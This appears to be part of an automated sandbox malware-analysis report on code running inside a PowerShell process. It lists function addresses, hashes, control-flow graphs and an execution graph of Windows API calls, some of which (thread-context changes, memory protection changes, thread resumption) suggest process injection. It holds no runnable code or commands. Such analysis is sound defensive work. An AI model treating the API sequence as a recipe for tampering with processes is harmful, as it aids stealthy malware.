                                                          Function 00007FFD347400DD Relevance: 2.9, Instructions: 2936COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2261622068.00007FFD34740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34740000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34740000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e6f76aec40c957ede19468613ac3dd925785bb87d29c111804e66d3dc2132899
                                                          • Instruction ID: 72c52c0610a9d17f0cbc7cedd23f7385a99f3b5cb2ed48a8059d6c44bdb8965b
                                                          • Opcode Fuzzy Hash: e6f76aec40c957ede19468613ac3dd925785bb87d29c111804e66d3dc2132899
                                                          • Instruction Fuzzy Hash: B2238271A1CB858FE775AB1888D5AB977E0EB99740F45057ED48CC7292CA38BC40CBC6
                                                          Function 00007FFD34680231 Relevance: 2.4, APIs: 1, Instructions: 888processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 978 7ffd34680231-7ffd3468023d 979 7ffd3468023f-7ffd34680247 978->979 980 7ffd34680248-7ffd3468065a 978->980 979->980 986 7ffd34680690-7ffd34680702 980->986 987 7ffd3468065c-7ffd3468068a 980->987 991 7ffd34680704-7ffd34680713 986->991 992 7ffd34680760-7ffd34680792 986->992 987->986 991->992 993 7ffd34680715-7ffd34680718 991->993 999 7ffd34680794-7ffd346807a3 992->999 1000 7ffd346807f0-7ffd34680841 992->1000 994 7ffd34680752-7ffd3468075a 993->994 995 7ffd3468071a-7ffd3468072d 993->995 994->992 997 7ffd34680731-7ffd34680744 995->997 998 7ffd3468072f 995->998 997->997 1001 7ffd34680746-7ffd3468074e 997->1001 998->997 999->1000 1002 7ffd346807a5-7ffd346807a8 999->1002 1008 7ffd34680843-7ffd34680852 1000->1008 1009 7ffd3468089f-7ffd346808d0 1000->1009 1001->994 1004 7ffd346807e2-7ffd346807ea 1002->1004 1005 7ffd346807aa-7ffd346807bd 1002->1005 1004->1000 1006 7ffd346807c1-7ffd346807d4 1005->1006 1007 7ffd346807bf 1005->1007 1006->1006 1010 7ffd346807d6-7ffd346807de 1006->1010 1007->1006 1008->1009 1011 7ffd34680854-7ffd34680857 1008->1011 1015 7ffd346808d2-7ffd346808da 1009->1015 1016 7ffd346808de-7ffd3468095e CreateProcessA 1009->1016 1010->1004 1013 7ffd34680891-7ffd34680899 1011->1013 1014 7ffd34680859-7ffd3468086c 1011->1014 1013->1009 1017 7ffd34680870-7ffd34680883 1014->1017 1018 7ffd3468086e 1014->1018 1015->1016 1019 7ffd34680960 1016->1019 1020 7ffd34680966-7ffd346809a3 call 7ffd346809bf 1016->1020 1017->1017 1021 7ffd34680885-7ffd3468088d 1017->1021 1018->1017 1019->1020 1024 7ffd346809aa-7ffd346809be 1020->1024 1025 7ffd346809a5 1020->1025 1021->1013 1025->1024
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: fdce7cf6695c8fd3f5a5ac8f9ff69565ee94eeb4f647df83f83037508749b148
                                                          • Instruction ID: ba7af9be51e098f1b537000ea0d828c3cdeb953727e692ff57d243ee4f278270
                                                          • Opcode Fuzzy Hash: fdce7cf6695c8fd3f5a5ac8f9ff69565ee94eeb4f647df83f83037508749b148
                                                          • Instruction Fuzzy Hash: C4D1293061CB898FEB64DF2CD8967E977E0FF56310F15426AD84DC7292DE78A4418B82
                                                          Function 00007FFD3467EB0A Relevance: 1.7, APIs: 1, Instructions: 245COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1118 7ffd3467eb0a-7ffd3467eb17 1119 7ffd3467eb22-7ffd3467eb4a 1118->1119 1120 7ffd3467eb19-7ffd3467eb21 1118->1120 1121 7ffd3467eb80-7ffd3467ebef 1119->1121 1122 7ffd3467eb4c-7ffd3467eb7d 1119->1122 1120->1119 1126 7ffd3467ebf1-7ffd3467ec00 1121->1126 1127 7ffd3467ec4a-7ffd3467ecc7 CreateFileMappingW 1121->1127 1122->1121 1126->1127 1128 7ffd3467ec02-7ffd3467ec05 1126->1128 1132 7ffd3467eccf-7ffd3467ed0b call 7ffd3467ed27 1127->1132 1133 7ffd3467ecc9 1127->1133 1130 7ffd3467ec3f-7ffd3467ec47 1128->1130 1131 7ffd3467ec07-7ffd3467ec1a 1128->1131 1130->1127 1134 7ffd3467ec1e-7ffd3467ec31 1131->1134 1135 7ffd3467ec1c 1131->1135 1140 7ffd3467ed12-7ffd3467ed26 1132->1140 1141 7ffd3467ed0d 1132->1141 1133->1132 1134->1134 1136 7ffd3467ec33-7ffd3467ec3b 1134->1136 1135->1134 1136->1130 1141->1140
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID: CreateFileMapping
                                                          • String ID:
                                                          • API String ID: 524692379-0
                                                          • Opcode ID: f497ffdf0f86de950c09a3cb9d934e6279be5fde4c3dfd691e17301fdd2beea9
                                                          • Instruction ID: 280e1d802278fc54fce4b4f59583f26435afea841cbc807e844bb1b361532d3c
                                                          • Opcode Fuzzy Hash: f497ffdf0f86de950c09a3cb9d934e6279be5fde4c3dfd691e17301fdd2beea9
                                                          • Instruction Fuzzy Hash: C871D43060CA8D4FEB59DF28CC557E87FE1FB56311F1442AEE84DC7292DA78A8458782
                                                          Function 00007FFD3467E8BC Relevance: 1.7, APIs: 1, Instructions: 225fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1142 7ffd3467e8bc-7ffd3467e8c3 1143 7ffd3467e8ce-7ffd3467e967 1142->1143 1144 7ffd3467e8c5-7ffd3467e8cd 1142->1144 1148 7ffd3467e9c2-7ffd3467ea5a CreateFileA 1143->1148 1149 7ffd3467e969-7ffd3467e978 1143->1149 1144->1143 1154 7ffd3467ea62-7ffd3467ea9e call 7ffd3467eaba 1148->1154 1155 7ffd3467ea5c 1148->1155 1149->1148 1150 7ffd3467e97a-7ffd3467e97d 1149->1150 1152 7ffd3467e97f-7ffd3467e992 1150->1152 1153 7ffd3467e9b7-7ffd3467e9bf 1150->1153 1156 7ffd3467e994 1152->1156 1157 7ffd3467e996-7ffd3467e9a9 1152->1157 1153->1148 1162 7ffd3467eaa0 1154->1162 1163 7ffd3467eaa5-7ffd3467eab9 1154->1163 1155->1154 1156->1157 1157->1157 1158 7ffd3467e9ab-7ffd3467e9b3 1157->1158 1158->1153 1162->1163
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: a82449b2c06afc5a74c4cadd41e132ec68b7770a7a26d4fe5689049db411166d
                                                          • Instruction ID: 56d42eb56d6f127592b756e9665b94783b6ed2d6125ad7c15c36fffe135a1463
                                                          • Opcode Fuzzy Hash: a82449b2c06afc5a74c4cadd41e132ec68b7770a7a26d4fe5689049db411166d
                                                          • Instruction Fuzzy Hash: C461C630A18A8D4FEB59EF28DC567E87BE0FB59310F10426AE84DC3252CB74A8458B81
                                                          Function 00007FFD3467ED76 Relevance: 1.6, APIs: 1, Instructions: 138fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1164 7ffd3467ed76-7ffd3467ed83 1165 7ffd3467ed8e-7ffd3467ed9f 1164->1165 1166 7ffd3467ed85-7ffd3467ed8d 1164->1166 1167 7ffd3467eda1-7ffd3467eda9 1165->1167 1168 7ffd3467edaa-7ffd3467edba 1165->1168 1166->1165 1167->1168 1169 7ffd3467edf0-7ffd3467ee61 MapViewOfFile 1168->1169 1170 7ffd3467edbc-7ffd3467edec 1168->1170 1173 7ffd3467ee63 1169->1173 1174 7ffd3467ee69-7ffd3467ee86 1169->1174 1170->1169 1173->1174
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID: FileView
                                                          • String ID:
                                                          • API String ID: 3314676101-0
                                                          • Opcode ID: e8db06085cd19b74ed93f44c7b25c9b731eab1ecbf5207cb142fef4dca4c1b44
                                                          • Instruction ID: 9e95ba9c726f2cead164e631aa6d2d19a88310fb43f0409161b34700ec947ed6
                                                          • Opcode Fuzzy Hash: e8db06085cd19b74ed93f44c7b25c9b731eab1ecbf5207cb142fef4dca4c1b44
                                                          • Instruction Fuzzy Hash: BA41463190CA888FEB19DB68DC556E97FF0FF5A321F04426FD089D3192DA686806CB91
                                                          Function 00007FFD3467E7B8 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1175 7ffd3467e7b8-7ffd3467e7bf 1176 7ffd3467e7c1-7ffd3467e7c9 1175->1176 1177 7ffd3467e7ca-7ffd3467e7da 1175->1177 1176->1177 1178 7ffd3467e810-7ffd3467e880 K32GetModuleInformation 1177->1178 1179 7ffd3467e7dc-7ffd3467e80f 1177->1179 1183 7ffd3467e882 1178->1183 1184 7ffd3467e888-7ffd3467e8b7 1178->1184 1179->1178 1183->1184
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID: InformationModule
                                                          • String ID:
                                                          • API String ID: 3425974696-0
                                                          • Opcode ID: b18ab001d6f2899aea705b8e13690e4485fa296fafd0e33c03925f5df509b8f7
                                                          • Instruction ID: 6fda9890a67207b22ffb9dafef4c112cfcc98793aae7272500e414df01e61722
                                                          • Opcode Fuzzy Hash: b18ab001d6f2899aea705b8e13690e4485fa296fafd0e33c03925f5df509b8f7
                                                          • Instruction Fuzzy Hash: 1331F53190CA484FDB18DBA898496F97BE1EB66321F04426ED059D3292CB746856C781
                                                          Function 00007FFD348F6C70 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2267797197.00007FFD348F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd348f0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: {'_H
                                                          • API String ID: 0-3848020189
                                                          • Opcode ID: 955b4a32ccf75d1e2fda24763104cd8187f944c528356ba49c58c52e3e7b36d3
                                                          • Instruction ID: 89817110a18761867ece7545f97754e27521a4c457791ee4fb64a24cf4633f3f
                                                          • Opcode Fuzzy Hash: 955b4a32ccf75d1e2fda24763104cd8187f944c528356ba49c58c52e3e7b36d3
                                                          • Instruction Fuzzy Hash: 1621C933B0DA194FEBA09B5C74A55F9B3D1EF94310B1802B7D54ED32A6ED1DAC165380
                                                          Function 00007FFD348F6C91 Relevance: 1.3, Strings: 1, Instructions: 38COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2267797197.00007FFD348F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd348f0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: {'_H
                                                          • API String ID: 0-3848020189
                                                          • Opcode ID: fca0290dc9a08500a356bae45b8028c6282ef4bd632763e1322945e9838a8fc9
                                                          • Instruction ID: aeb1fc999197abb2ab9792bcc25436e47f37784355c45b868c409901daf1100c
                                                          • Opcode Fuzzy Hash: fca0290dc9a08500a356bae45b8028c6282ef4bd632763e1322945e9838a8fc9
                                                          • Instruction Fuzzy Hash: 38F0A723F0EA690BF7B19A5C34A51F563C1DF656207480276D69EE73A2EC0CAC164380
                                                          Function 00007FFD348F72D4 Relevance: .1, Instructions: 113COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2267797197.00007FFD348F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd348f0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bed90e89ae41be27aa2ba1972725123a6fc2e5cd6430e3b4bcd6ecbdaf80258e
                                                          • Instruction ID: 1b6fc63ad809fb9f294d9d1d03c8e8355b75c768dee61f558575435ac399503b
                                                          • Opcode Fuzzy Hash: bed90e89ae41be27aa2ba1972725123a6fc2e5cd6430e3b4bcd6ecbdaf80258e
                                                          • Instruction Fuzzy Hash: 2D31EA73B0DA495FEB94DB1C98951B877E1FFAA314714027FD48ED3252DA25EC028741

                                                          Non-executed Functions

                                                          Function 00007FFD3467C498 Relevance: 3.4, Strings: 2, Instructions: 935COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LR_L$^
                                                          • API String ID: 0-475922714
                                                          • Opcode ID: 47b722974e52d104bc799d4b38b81e339e90457ed558faeceefec1a0157f1496
                                                          • Instruction ID: 73b209b35192f08b907b958d03c665e817f0f30ccbe14f1238c350b72f349372
                                                          • Opcode Fuzzy Hash: 47b722974e52d104bc799d4b38b81e339e90457ed558faeceefec1a0157f1496
                                                          • Instruction Fuzzy Hash: 53620331B0C79A4FEB55DF2CC8A55E97FE0EF96314F1441BAD189C7293DA28A842C781
                                                          Function 00007FFD346716FA Relevance: 1.4, Strings: 1, Instructions: 174COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: -N_^
                                                          • API String ID: 0-3102225757
                                                          • Opcode ID: d377ab8ec4feab91d8ece4c3522071b8ed6f0476df4e469f26bf21c888263ece
                                                          • Instruction ID: 75e3337470f9f46f97dcddbbb309ff91e47e627bfff1e294a7f3cfab0cf269a7
                                                          • Opcode Fuzzy Hash: d377ab8ec4feab91d8ece4c3522071b8ed6f0476df4e469f26bf21c888263ece
                                                          • Instruction Fuzzy Hash: CE514256A0E7D61EE7235B785CB60EA7FA5DF53268B0940F7C2D4CE193ED0C2406A212
                                                          Function 00007FFD3467BFF2 Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ^
                                                          • API String ID: 0-1590793086
                                                          • Opcode ID: 5abf550963b5798cf30258f1d295fb91103dc1f1da305662261fea64c5c85088
                                                          • Instruction ID: a2b870feb85a31db4ad6a359aef2754d8169be729c4b80f705bceb62d04e0cde
                                                          • Opcode Fuzzy Hash: 5abf550963b5798cf30258f1d295fb91103dc1f1da305662261fea64c5c85088
                                                          • Instruction Fuzzy Hash: 1D417657A0E7E64BE7628E6C5CFA0E93FD0DF13718B0D40BACA84CB093ED0D64569645
                                                          Function 00007FFD34673E45 Relevance: .4, Instructions: 410COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d69584a4d6211167082b4075d075cb6932da12dd17b2f1cf15c46c1841f71526
                                                          • Instruction ID: 9011191b2194591203ccc773f44b687fcbb698fa873b75d11769762092a1c063
                                                          • Opcode Fuzzy Hash: d69584a4d6211167082b4075d075cb6932da12dd17b2f1cf15c46c1841f71526
                                                          • Instruction Fuzzy Hash: ADD1D431F08A598FDB85DF5CC8A5AED7FE1FF66310F04817AD449D7292DA28A881C781
                                                          Function 00007FFD3467C9FB Relevance: .4, Instructions: 352COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 195113558649c57485cf447998ec7470fdf26c9f29f44bf3f0e1e67a92977364
                                                          • Instruction ID: c0dc1fa3c66be6765f0b57ab8aaab0ae2f71b4de0d2e75f7ceb6fad88ad8d21b
                                                          • Opcode Fuzzy Hash: 195113558649c57485cf447998ec7470fdf26c9f29f44bf3f0e1e67a92977364
                                                          • Instruction Fuzzy Hash: 46C1C631A0CA5A4FDF95DF5CC8A5AE97FE1FFA6310F14417AD149D7292CA28E842C780
                                                          Function 00007FFD346736F1 Relevance: .2, Instructions: 220COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8e7236da04a8507d82c35f457b1f7fdbd07dfac3bdcca5cbb46649d0cf1b4de1
                                                          • Instruction ID: c18fcee0c5a70373d4cb95818aeeb30e15ce58d51b0d8dd1ef090a992e2fda71
                                                          • Opcode Fuzzy Hash: 8e7236da04a8507d82c35f457b1f7fdbd07dfac3bdcca5cbb46649d0cf1b4de1
                                                          • Instruction Fuzzy Hash: D0719F5660E3E25FE3135B685CB51E63FA0DF93224B4A44FBC6C5CE0A3D90C144AD3A1
                                                          Function 00007FFD346716BF Relevance: .2, Instructions: 188COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f445f87037e5effe460e8a35645462844381adb5b597771e90438fb1c1a560bd
                                                          • Instruction ID: 5716136a3bb2e497e67fecbb667adf3fb3576dca4eb615f25590be7e2dedbd5d
                                                          • Opcode Fuzzy Hash: f445f87037e5effe460e8a35645462844381adb5b597771e90438fb1c1a560bd
                                                          • Instruction Fuzzy Hash: 92516456A0D7D61EE7236B785CB60EA7FA5DF53268B0940F7C2D4CE193ED0C2447A212

                                                          Execution Graph

                                                          Execution Coverage:0.8%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:2.3%
                                                          Total number of Nodes:1393
                                                          Total number of Limit Nodes:1
                                                          execution_graph 8596 1d29e8c6120 8597 1d29e8c612d 8596->8597 8598 1d29e8c624a 8597->8598 8600 1d29e8c6139 8597->8600 8602 1d29e8c632e 8598->8602 8603 1d29e8c6271 VirtualProtect FlushInstructionCache 8598->8603 8599 1d29e8c61bd 8600->8599 8601 1d29e8c6196 SetThreadContext 8600->8601 8601->8599 8604 1d29e8c634e 8602->8604 8612 1d29e8c4810 8602->8612 8603->8598 8616 1d29e8c5220 GetCurrentProcess 8604->8616 8607 1d29e8c63a7 8610 1d29e8c7d70 _log10_special 8 API calls 8607->8610 8608 1d29e8c6367 ResumeThread 8609 1d29e8c6353 8608->8609 8609->8607 8609->8608 8611 1d29e8c63ef 8610->8611 8614 1d29e8c482c 8612->8614 8613 1d29e8c488f 8613->8604 8614->8613 8615 1d29e8c4842 VirtualFree 8614->8615 8615->8614 8617 1d29e8c523c 8616->8617 8618 1d29e8c5252 VirtualProtect FlushInstructionCache 8617->8618 8619 1d29e8c5283 8617->8619 8618->8617 8619->8609 7638 1d29e8d0020 7641 1d29e8cffd8 7638->7641 7646 1d29e8ccdcc EnterCriticalSection 7641->7646 8151 1d29e8cbfa1 8152 1d29e8ccad8 23 API calls 8151->8152 8153 1d29e8cbfa6 8152->8153 8154 1d29e8cbfcd GetModuleHandleW 8153->8154 8155 1d29e8cc017 8153->8155 8154->8155 8157 1d29e8cbfda 8154->8157 8168 1d29e8cbea4 8155->8168 8157->8155 8163 1d29e8cc0c8 GetModuleHandleExW 8157->8163 8164 1d29e8cc0fc GetProcAddress 8163->8164 8165 1d29e8cc10e 8163->8165 8164->8165 8166 1d29e8cc131 8165->8166 8167 1d29e8cc12a FreeLibrary 8165->8167 8166->8155 8167->8166 8182 1d29e8ccdcc EnterCriticalSection 8168->8182 8631 1d29e8c211c 8632 1d29e8c214d 8631->8632 8633 1d29e8c2171 8632->8633 8634 1d29e8c2263 8632->8634 8640 1d29e8c222e 8632->8640 8638 1d29e8c21a9 StrCmpNIW 8633->8638 8633->8640 8642 1d29e8c1c34 8633->8642 8635 1d29e8c22d7 8634->8635 8636 1d29e8c2268 8634->8636 8639 1d29e8c31cc 11 API calls 8635->8639 8635->8640 8648 1d29e8c31cc GetProcessHeap HeapAlloc 8636->8648 8638->8633 8639->8640 8640->8640 8643 1d29e8c1c5b GetProcessHeap HeapAlloc 8642->8643 8645 1d29e8c1cb8 8642->8645 8644 1d29e8c1c96 8643->8644 8643->8645 8646 1d29e8c1c00 2 API calls 8644->8646 8645->8633 8647 1d29e8c1c9e GetProcessHeap HeapFree 8646->8647 8647->8645 8650 1d29e8c321f 8648->8650 8649 1d29e8c32dd GetProcessHeap HeapFree 8649->8640 8650->8649 8651 1d29e8c32d8 8650->8651 8652 1d29e8c326a StrCmpNIW 8650->8652 8653 1d29e8c1c34 6 API calls 8650->8653 8651->8649 8652->8650 8653->8650 7647 1d29e8cfc1c 7648 1d29e8cfc55 7647->7648 7649 1d29e8cfc26 7647->7649 7649->7648 7650 1d29e8cfc3b FreeLibrary 7649->7650 7650->7649 9033 1d29e8d0698 9034 1d29e8d06c2 9033->9034 9035 1d29e8cdafc _invalid_parameter_noinfo 11 API calls 9034->9035 9036 1d29e8d06e1 9035->9036 9037 1d29e8cdb74 __free_lconv_mon 11 API calls 9036->9037 9038 1d29e8d06ef 9037->9038 9039 1d29e8cdafc _invalid_parameter_noinfo 11 API calls 9038->9039 9043 1d29e8d0719 9038->9043 9040 1d29e8d070b 9039->9040 9042 1d29e8cdb74 __free_lconv_mon 11 API calls 9040->9042 9041 1d29e8cfa3c 6 API calls 9041->9043 9042->9043 9043->9041 9044 1d29e8d0722 9043->9044 8202 1d29e8d5395 8203 1d29e8d53ae 8202->8203 8204 1d29e8d53a4 8202->8204 8206 1d29e8cce20 LeaveCriticalSection 8204->8206 8654 1d29e8cc514 8655 1d29e8cc52d 8654->8655 8664 1d29e8cc529 8654->8664 8669 1d29e8cf0c0 8655->8669 8660 1d29e8cc53f 8662 1d29e8cdb74 __free_lconv_mon 11 API calls 8660->8662 8661 1d29e8cc54b 8695 1d29e8cc588 8661->8695 8662->8664 8666 1d29e8cdb74 __free_lconv_mon 11 API calls 8667 1d29e8cc572 8666->8667 8668 1d29e8cdb74 __free_lconv_mon 11 API calls 8667->8668 8668->8664 8670 1d29e8cf0cd 8669->8670 8671 1d29e8cc532 8669->8671 8714 1d29e8cd32c 8670->8714 8675 1d29e8cf61c GetEnvironmentStringsW 8671->8675 8673 1d29e8cf0fc 8731 1d29e8ced98 8673->8731 8676 1d29e8cf64c 8675->8676 8677 1d29e8cc537 8675->8677 8678 1d29e8cf53c WideCharToMultiByte 8676->8678 8677->8660 8677->8661 8679 1d29e8cf69d 8678->8679 8680 1d29e8cf6a4 FreeEnvironmentStringsW 8679->8680 8681 1d29e8cce3c 12 API calls 8679->8681 8680->8677 8682 1d29e8cf6b7 8681->8682 8683 1d29e8cf6bf 8682->8683 8684 1d29e8cf6c8 8682->8684 8685 1d29e8cdb74 __free_lconv_mon 11 API calls 8683->8685 8686 1d29e8cf53c WideCharToMultiByte 8684->8686 8688 1d29e8cf6c6 8685->8688 8687 1d29e8cf6eb 8686->8687 8689 1d29e8cf6ef 8687->8689 8690 1d29e8cf6f9 8687->8690 8688->8680 8691 1d29e8cdb74 __free_lconv_mon 11 API calls 8689->8691 8692 1d29e8cdb74 __free_lconv_mon 11 API calls 8690->8692 8693 1d29e8cf6f7 FreeEnvironmentStringsW 8691->8693 8692->8693 8693->8677 8696 1d29e8cc5ad 8695->8696 8697 1d29e8cdafc _invalid_parameter_noinfo 11 API calls 8696->8697 8708 1d29e8cc5e3 8697->8708 8698 1d29e8cdb74 __free_lconv_mon 11 API calls 8700 1d29e8cc553 8698->8700 8699 1d29e8cc65e 8701 1d29e8cdb74 __free_lconv_mon 11 API calls 8699->8701 8700->8666 8701->8700 8702 1d29e8cdafc _invalid_parameter_noinfo 11 API calls 8702->8708 8703 1d29e8cc64d 8901 1d29e8cc698 8703->8901 8704 1d29e8ccb18 __std_exception_copy 49 API calls 8704->8708 8707 1d29e8cdb74 __free_lconv_mon 11 API calls 8710 1d29e8cc5eb 8707->8710 8708->8699 8708->8702 8708->8703 8708->8704 8709 1d29e8cc683 8708->8709 8708->8710 8712 1d29e8cdb74 __free_lconv_mon 11 API calls 8708->8712 8711 1d29e8cd9c0 _invalid_parameter_noinfo 17 API calls 8709->8711 8710->8698 8713 1d29e8cc696 8711->8713 8712->8708 8715 1d29e8cd33d FlsGetValue 8714->8715 8716 1d29e8cd358 FlsSetValue 8714->8716 8717 1d29e8cd352 8715->8717 8720 1d29e8cd34a 8715->8720 8718 1d29e8cd365 8716->8718 8716->8720 8717->8716 8719 1d29e8cdafc _invalid_parameter_noinfo 11 API calls 8718->8719 8721 1d29e8cd374 8719->8721 8720->8673 8722 1d29e8cd392 FlsSetValue 8721->8722 8723 1d29e8cd382 FlsSetValue 8721->8723 8725 1d29e8cd39e FlsSetValue 8722->8725 8726 1d29e8cd3b0 8722->8726 8724 1d29e8cd38b 8723->8724 8727 1d29e8cdb74 __free_lconv_mon 11 API calls 8724->8727 8725->8724 8728 1d29e8ccfc4 _invalid_parameter_noinfo 11 API calls 8726->8728 8727->8720 8729 1d29e8cd3b8 8728->8729 8730 1d29e8cdb74 __free_lconv_mon 11 API calls 8729->8730 8730->8720 8754 1d29e8cf008 8731->8754 8738 1d29e8cee03 8739 1d29e8cdb74 __free_lconv_mon 11 API calls 8738->8739 8752 1d29e8cedea 8739->8752 8740 1d29e8cee12 8740->8740 8780 1d29e8cf13c 8740->8780 8743 1d29e8cef0e 8744 1d29e8cdadc __free_lconv_mon 11 API calls 8743->8744 8746 1d29e8cef13 8744->8746 8745 1d29e8cef69 8753 1d29e8cefd0 8745->8753 8791 1d29e8ce8c8 8745->8791 8748 1d29e8cdb74 __free_lconv_mon 11 API calls 8746->8748 8747 1d29e8cef28 8747->8745 8749 1d29e8cdb74 __free_lconv_mon 11 API calls 8747->8749 8748->8752 8749->8745 8751 1d29e8cdb74 __free_lconv_mon 11 API calls 8751->8752 8752->8671 8753->8751 8755 1d29e8cf02b 8754->8755 8760 1d29e8cf035 8755->8760 8806 1d29e8ccdcc EnterCriticalSection 8755->8806 8762 1d29e8cd32c 16 API calls 8760->8762 8765 1d29e8cedcd 8760->8765 8763 1d29e8cf0fc 8762->8763 8764 1d29e8ced98 69 API calls 8763->8764 8764->8765 8766 1d29e8cea98 